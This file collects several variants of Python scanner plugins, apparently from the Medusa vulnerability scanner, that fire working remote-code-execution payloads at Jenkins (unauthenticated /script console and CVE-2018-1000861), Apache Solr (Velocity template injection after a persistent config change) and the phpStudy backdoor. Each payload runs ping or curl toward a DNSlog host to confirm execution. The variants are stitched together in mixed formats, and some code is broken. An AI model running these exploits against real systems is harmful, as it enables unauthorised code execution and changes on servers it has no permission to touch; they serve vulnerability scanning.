def medusa(**kwargs)->None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 global resp global resp2 DL = ClassCongregation.Dnslog() # 初始化DNSlog DL.dns_host() post_data = '''script%3dprintln+%22ping+{}%22.execute().text%26Jenkins-Crumb%3d32bfdadca3609e1e2f8e8414a0f363c16dd4115eb4e6af6305f2383a0ae40610%26json%3d%7b%22script%22%3a+%22println+%5c%22ping+{}%5c%22.execute().text%22%2c+%22%22%3a+%22%22%2c+%22Jenkins-Crumb%22%3a+%2232bfdadca3609e1e2f8e8414a0f363c16dd4115eb4e6af6305f2383a0ae40610%22%7d%26Submit%3d%e8%bf%90%e8%a1%8c'''.format( DL.dns_host(), DL.dns_host()) payload = "/script" try: payload_url = url + payload s = requests.session() cookises=re.compile('.*Cookie (.*) for.*').findall(str(s.get(payload_url,timeout=6,proxies=proxies,verify=False).cookies))[0]#正则匹配获取的Cookie字符串 Headers['Content-Type']='application/x-www-form-urlencoded' Headers['Accept']='text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' Headers['Cookis']=cookises resp = s.post(payload_url,headers=Headers, data=post_data,timeout=6,proxies=proxies, verify=False) con = resp.text if DL.result(): Medusa = "{}Jenkins配置不当导致未授权代码执行漏洞\r\n漏洞详情:\r\nPayload:{}\r\n返回数据包:{}\r\nDNSlog内容:{}\r\n".format(url, payload_url,con,DL.dns_host()) _t=VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l=ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
    """Check a Solr target for the VelocityResponseWriter template RCE.

    Flow: GET ``/solr/admin/cores`` and parse the JSON; if a ``status`` map is
    present, take the last core name listed, POST ``payload_data`` to that
    core's ``/config`` endpoint, then GET a ``select`` request carrying a
    Velocity template that runs ``ping`` against a DNSlog hostname. The finding
    is recorded only when ``DL.result()`` reports the out-of-band lookup.

    Args:
        Url: target URL; split by ``UrlProcessing`` into scheme, host and port.
        Headers: header dict for the requests. ``Headers1`` and ``Headers2``
            below are aliases of this same dict, not copies, so every
            ``Content-Type`` assignment mutates the caller's dict and the last
            one (``application/json``) is what the final GET sends too.
        proxies: resolved through ``ClassCongregation.Proxies().result``.
        **kwargs: forwarded to ``VulnerabilityDetails``.

    Returns:
        None. Findings go to ``VulnerabilityDetails`` and ``WriteFile``; every
        exception (including ``json.loads`` on a non-JSON body) is caught and
        routed to ``ErrorHandling`` / ``ErrorLog``.

    Side effects:
        TLS verification is disabled (``verify=False``) on the POST and the
        second GET but left at the library default on the first GET.
    """
    proxies=ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme when UrlProcessing did not return one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as given
    try:
        Headers1=Headers  # alias, not a copy — mutations below reach the caller
        Headers1['Content-Type']='application/x-www-form-urlencoded'
        payload_url=scheme + "://" + url + ":" + str(port) +'/solr/admin/cores'
        step1 =requests.get(payload_url,timeout=6,proxies=proxies, headers = Headers1).text
        data = json.loads(step1)
        if 'status' in data:
            # Iterating a dict yields keys; the loop leaves the last core name in ``name``.
            name = ''
            for x in data['status']:
                name = x
            payload = "/solr/"+name+"/config"
            DL = ClassCongregation.Dnslog()
            # ``select`` query with the Velocity template; the DNSlog host is
            # substituted into the ``exec`` argument.
            payload2 = '/solr/'+name+'/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ping {}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'.format(DL.dns_host())
            payload_url1 = scheme + "://" + url +":"+ str(port)+ payload
            payload_url2 = scheme + "://" + url + ":" + str(port) + payload2
            # Config-API body that enables the Velocity response writer with
            # resource loading turned on; this is a persistent change on the target.
            payload_data = """{ "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } }"""
            Headers2 = Headers  # same dict object as Headers1
            Headers2['Content-Type']='application/json'
            resp = requests.post(payload_url1,data=payload_data,headers=Headers2,proxies=proxies, timeout=6, verify=False)
            resp2 = requests.get(payload_url2, headers=Headers1, timeout=6,proxies=proxies, verify=False)
            con2 = resp2.text
            if DL.result() :
                # Report text (kept verbatim). The template has two placeholders
                # but three arguments are passed: ``con2`` fills the DNSlog slot
                # and ``DL.dns_host()`` is silently dropped by str.format.
                Medusa = "{} SolrVelocity模板远程代码执行漏洞\r\n验证数据:\r\nDNSlog:{}\r\n".format(url,con2,DL.dns_host())
                _t=VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write()  # hand the URL and scan data to the reporter
                ClassCongregation.WriteFile().result(str(url),str(Medusa))  # write to file: url is the per-target file name, Medusa the result
    except Exception as e:
        # 'algroup' is used as the plugin name; if it is None the string
        # concatenation below raises inside the handler.
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)  # record to the error log
def medusa(Url, RandomAgent, proxies=None, **kwargs) -> None:
    """Check a Jenkins target for an unauthenticated script console (``/script``).

    Same check as the ``**kwargs`` variant, but the target is split by
    ``UrlProcessing`` and the request headers are built locally from
    ``RandomAgent`` rather than taken from the caller.

    Args:
        Url: target URL; split into scheme, host and port.
        RandomAgent: value sent as the ``User-Agent`` header.
        proxies: resolved through ``ClassCongregation.Proxies().result``.
        **kwargs: forwarded to ``VulnerabilityDetails``.

    Returns:
        None. Findings go to ``VulnerabilityDetails`` and ``WriteFile``; every
        exception is caught and routed to ``ErrorHandling`` / ``ErrorLog``.

    Side effects:
        Assigns the module-level ``resp`` (declared ``global``); ``resp2`` is
        declared ``global`` but never assigned here. TLS verification is
        disabled on both requests (``verify=False``).
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme when UrlProcessing did not return one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as given
    global resp
    global resp2
    DL = ClassCongregation.Dnslog()  # initialise the DNSlog client
    DL.dns_host()
    # Form body for the script console with the DNSlog host substituted twice.
    # The Jenkins-Crumb values are fixed literals embedded in the template.
    # NOTE(review): assumes DL.dns_host() returns the same hostname on every
    # call (it is invoked several times in this function) — confirm in Dnslog.
    post_data = '''script%3dprintln+%22ping+{}%22.execute().text%26Jenkins-Crumb%3d32bfdadca3609e1e2f8e8414a0f363c16dd4115eb4e6af6305f2383a0ae40610%26json%3d%7b%22script%22%3a+%22println+%5c%22ping+{}%5c%22.execute().text%22%2c+%22%22%3a+%22%22%2c+%22Jenkins-Crumb%22%3a+%2232bfdadca3609e1e2f8e8414a0f363c16dd4115eb4e6af6305f2383a0ae40610%22%7d%26Submit%3d%e8%bf%90%e8%a1%8c'''.format( DL.dns_host(), DL.dns_host())
    payload = "/script"
    try:
        payload_url = scheme + "://" + url + ':' + str(port) + payload
        s = requests.session()
        # Regex-extract the cookie string from the repr of the cookie jar.
        # If no cookie was set, ``[0]`` raises IndexError and we fall through
        # to the except branch — the POST is never sent in that case.
        cookises = re.compile('.*Cookie (.*) for.*').findall( str( s.get(payload_url, timeout=6, proxies=proxies, verify=False).cookies))[0]  # regex match to obtain the cookie string
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'en',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Cookis': cookises  # stored under the header key 'Cookis' exactly as written
        }
        resp = s.post(payload_url, headers=headers, data=post_data, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        if DL.result():
            # Report text (kept verbatim): target, payload URL, the raw response
            # body and the DNSlog host.
            Medusa = "{}Jenkins配置不当导致未授权代码执行漏洞\r\n漏洞详情:\r\nPayload:{}\r\n返回数据包:{}\r\nDNSlog内容:{}\r\n".format( url, payload_url, con, DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write()  # hand the URL and scan data to the reporter
            ClassCongregation.WriteFile().result( str(url), str(Medusa))  # write to file: url is the per-target file name, Medusa the result
    except Exception as e:
        # Broad catch; 'algroup' is the plugin name handed to the error log.
        # Unlike sibling variants, the exception object itself is not written
        # to ErrorLog here — only the URL and plugin name.
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # record to the error log
def medusa(Url, RandomAgent, proxies=None, **kwargs) -> None:
    """Check a Jenkins target for CVE-2018-1000861 via the ``checkScript`` endpoint.

    Flow: build a Groovy class whose constructor runs ``curl`` against a
    DNSlog hostname, URL-encode it into the ``value`` query parameter of the
    ``SecureGroovyScript/checkScript`` endpoint, and POST it. The finding is
    recorded only when ``DL.result()`` reports the out-of-band lookup.

    Args:
        Url: target URL; split by ``UrlProcessing`` into scheme, host and port.
        RandomAgent: value sent as the ``User-Agent`` header.
        proxies: resolved through ``ClassCongregation.Proxies().result``.
        **kwargs: forwarded to ``VulnerabilityDetails``.

    Returns:
        None. Findings go to ``VulnerabilityDetails`` and ``WriteFile``; every
        exception is caught and routed to ``ErrorHandling`` / ``ErrorLog``.

    Side effects:
        TLS verification is disabled on the request (``verify=False``).
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme when UrlProcessing did not return one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as given
    try:
        DL = ClassCongregation.Dnslog()
        # Groovy source with the DNSlog host substituted via %-formatting.
        a = '''public class x { public x(){ "curl %s".execute() } }''' % DL.dns_host()
        payload2 = urllib.parse.quote(a)  # URL-encode the script for the query string
        payload1 = "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value="
        payload_url = scheme + "://" + url + ':' + str( port) + payload1 + payload2
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'en',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        # POST with no body; everything is carried in the query string.
        resp = requests.post(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        if DL.result():
            # Report text (kept verbatim): target, payload URL, raw response body, DNSlog host.
            Medusa = "{} Jenkins远程命令执行漏洞(CVE-2018-1000861)\r\n漏洞详情:\r\nPayload:{}\r\n返回数据包:{}\r\nDNSlog内容:{}\r\n".format( url, payload_url, con, DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write()  # hand the URL and scan data to the reporter
            ClassCongregation.WriteFile().result( str(url), str(Medusa))  # write to file: url is the per-target file name, Medusa the result
    except Exception as e:
        # 'algroup' is used as the plugin name; if it is None the string
        # concatenation below raises inside the handler.
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e)  # record to the error log
def medusa(Url, RandomAgent, proxies=None, **kwargs) -> None:
    """Check a target for the phpStudy backdoor trigger.

    Flow: base64-encode a PHP ``system("curl ...")`` call pointing at a DNSlog
    hostname, send it in the ``accept-charset`` request header on a GET, and
    record a finding only when ``DL.result()`` reports the out-of-band lookup.

    Args:
        Url: target URL; split by ``UrlProcessing`` into scheme, host and port.
        RandomAgent: value sent as the ``User-Agent`` header.
        proxies: resolved through ``ClassCongregation.Proxies().result``.
        **kwargs: forwarded to ``VulnerabilityDetails``.

    Returns:
        None. Findings go to ``VulnerabilityDetails`` and ``WriteFile``; every
        exception is caught and routed to ``ErrorHandling`` / ``ErrorLog``.

    Notes:
        ``payload`` is not defined anywhere in this function; it must be a
        module-level name that is not visible here. If it is missing, the
        NameError is swallowed by the ``except`` branch. TLS verification is
        disabled on the request (``verify=False``).
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme when UrlProcessing did not return one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as given
    DL = ClassCongregation.Dnslog()
    commandS = ('''system("curl http://{}");''').format(DL.dns_host())
    cmd = base64.b64encode(commandS.encode('utf-8'))  # bytes, sent as-is as a header value
    try:
        # ``payload`` comes from outside this function (see docstring).
        payload_url = scheme + "://" + url + ':' + str(port) + payload
        headers = {
            'Sec-Fetch-Mode': 'navigate',
            'Sec-Fetch-User': '******',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
            'Sec-Fetch-Site': 'none',
            'accept-charset': cmd,
            'Accept-Encoding': 'gzip,deflate',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'User-Agent': RandomAgent
        }
        s = requests.session()
        resp = s.get(payload_url, headers=headers, timeout=5, proxies=proxies, verify=False)
        if DL.result():  # if True:  <- leftover debug switch, kept as found
            # Report text (kept verbatim): target, payload URL, the full header
            # dict (including the encoded command) and the DNSlog host.
            Medusa = "{} 存在phpStudyBackdoor脚本漏洞\r\n漏洞详情:\r\nPayload:{}\r\nHeader:{}\r\nDNSLOG内容:{}\r\n".format( url, payload_url, headers, DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write()  # hand the URL and scan data to the reporter
            ClassCongregation.WriteFile().result( str(url), str(Medusa))  # write to file: url is the per-target file name, Medusa the result
    except Exception as e:
        # Broad catch; only the URL and plugin name reach ErrorLog here, the
        # exception object itself is not written.
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # record to the error log
def medusa(**kwargs) -> None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: DL = ClassCongregation.Dnslog() a = '''public class x { public x(){ "curl %s".execute() } }''' % DL.dns_host() payload2 = urllib.parse.quote(a) # url编码 payload1 = "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=" payload_url = url + payload1 + payload2 Headers['Content-Type'] = 'application/x-www-form-urlencoded' Headers[ 'Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' resp = requests.post(payload_url, headers=Headers, timeout=6, proxies=proxies, verify=False) con = resp.text if DL.result(): Medusa = "{} Jenkins远程命令执行漏洞(CVE-2018-1000861)\r\n漏洞详情:\r\nPayload:{}\r\n返回数据包:{}\r\nDNSlog内容:{}\r\n".format( url, payload_url, con, DL.dns_host()) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, resp, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, Token, proxies=None) -> None:
    """Check a Solr target for the VelocityResponseWriter template RCE.

    Same check as the ``(Url, Headers, ...)`` variant, but headers are built
    locally from ``RandomAgent`` (two separate dicts, so the ``Content-Type``
    of the first GET is not affected by the POST) and ``Token`` is passed to
    ``VulnerabilityDetails`` instead of ``**kwargs``.

    Args:
        Url: target URL; split by ``UrlProcessing`` into scheme, host and port.
        RandomAgent: value sent as the ``User-Agent`` header.
        Token: handed to ``VulnerabilityDetails`` as its third argument.
        proxies: resolved through ``ClassCongregation.Proxies().result``.

    Returns:
        None. Findings go to ``VulnerabilityDetails`` and ``WriteFile``; every
        exception (including ``json.loads`` on a non-JSON body) is caught and
        routed to ``ErrorHandling`` / ``ErrorLog``.

    Side effects:
        TLS verification is disabled (``verify=False``) on the POST and the
        second GET but left at the library default on the first GET.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme when UrlProcessing did not return one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as given
    try:
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        payload_url = scheme + "://" + url + ":" + str( port) + '/solr/admin/cores'
        step1 = requests.get(payload_url, timeout=6, proxies=proxies, headers=headers).text
        data = json.loads(step1)
        if 'status' in data:
            # Iterating a dict yields keys; the loop leaves the last core name in ``name``.
            name = ''
            for x in data['status']:
                name = x
            payload = "/solr/" + name + "/config"
            DL = ClassCongregation.Dnslog()
            # ``select`` query with the Velocity template; the DNSlog host is
            # substituted into the ``exec`` argument.
            payload2 = '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ping {}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'.format( DL.dns_host())
            payload_url1 = scheme + "://" + url + ":" + str(port) + payload
            payload_url2 = scheme + "://" + url + ":" + str(port) + payload2
            # Config-API body that enables the Velocity response writer with
            # resource loading turned on; this is a persistent change on the target.
            payload_data = """{ "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } }"""
            headers1 = {
                'User-Agent': RandomAgent,
                'Content-Type': 'application/json',
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
                'Accept-Encoding': 'gzip, deflate',
            }
            resp = requests.post(payload_url1, data=payload_data, headers=headers1, proxies=proxies, timeout=6, verify=False)
            resp2 = requests.get(payload_url2, headers=headers, timeout=6, proxies=proxies, verify=False)
            con2 = resp2.text
            if DL.result():
                # Report text (kept verbatim). The template has two placeholders
                # but three arguments are passed: ``con2`` fills the DNSlog slot
                # and ``DL.dns_host()`` is silently dropped by str.format.
                Medusa = "{} SolrVelocity模板远程代码执行漏洞\r\n验证数据:\r\nDNSlog:{}\r\n".format( url, con2, DL.dns_host())
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails( _t.info, url, Token).Write()  # hand the URL and scan data to the reporter
                ClassCongregation.WriteFile().result( str(url), str(Medusa))  # write to file: url is the per-target file name, Medusa the result
    except Exception as e:
        # Broad catch; 'algroup' is the plugin name handed to the error log.
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # record to the error log, passing the URL and the failing plugin name